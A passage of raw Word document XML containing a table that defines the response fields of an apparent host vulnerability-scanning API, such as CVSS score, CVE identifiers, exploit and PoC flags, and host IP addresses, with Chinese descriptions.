          <w:p w14:paraId="7D82ADA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="194CB28B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E6A2E14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>详情，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="附录2-windows后门检测-查询结果-data数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>附录2</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EF231AE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D941C10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remedDescription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="660572EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A168ACB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DD77D64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C56F8A8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C68BD93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hasExp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="293D7051" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350AAAF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="754CBF62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否存在exp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7BA41E1A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F8E07CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16CDCA85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FDF06A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A0E8F81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否内核漏洞（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6CD36D8A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6223CE45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>localEscalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12AD0C9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13C93A21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C7B0B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否本地提权（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6838652B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="061E3A27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50A996C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15092084" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A31167C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否远程执行（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DB48BCB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="568DFF75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hasPoc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="208E075E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03BD6F27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="155DE205" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>存在poc（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="51429D4F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2263CA82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cvssScore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="695C95F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FF15203" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07E4028D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Cvss分</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F547BA1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0399C17C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cvss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA06719" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="709FF4A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4378E0CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Cvss详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A950D43" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37178596" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>refs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C6CAAE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FE435FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>mediumblob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40F7B985" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Cve引用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D923433" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432ABD66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>expRefs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59B0C7D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DEFA8D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E2D5E95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>参考连接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32F56B29" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CE95999" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cves</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F1F30F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AA5C98D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1531CF96" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>CVE编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="14A065E1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C1CCA2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="478508B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55AC7C05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="551EAB59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>漏洞类型:0 SQL注入,1 未授权访问,2 敏感信息泄露,3 XML外部实体注入,4 跨站脚本攻击,5 不安全的反序列,6 客户端请求伪造,7 服务端请求伪造,8 命令执行,9 代码执行,10 任意文件上传,11 任意文件读取,12 拒绝服务攻击,13 目录遍历,14 恶意后门,15 本地提权,16 注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CDAC164" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68711578" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5551874A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C014E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinytext</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AEE8E6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>利用条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="601497FB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F39F26B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>appVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D15CB95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="483015BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77BE717C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>受影响应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4DA50ACF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="111774CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pocCheckResults</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BE845D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28CC4EDB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40F9E3CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POC检测结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E598E45" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F9C9126" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44793280" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78932E37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4160EC64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D1443AD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CB3D405" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69D98D52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A0F63E5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B78319E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08854B5C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D75366A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B55001" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ACB2BDA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F5E1CD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="300230B0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA8C795" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71FDA40D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A8B698E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="415D368A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5C995825" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F12A0A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68A958BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
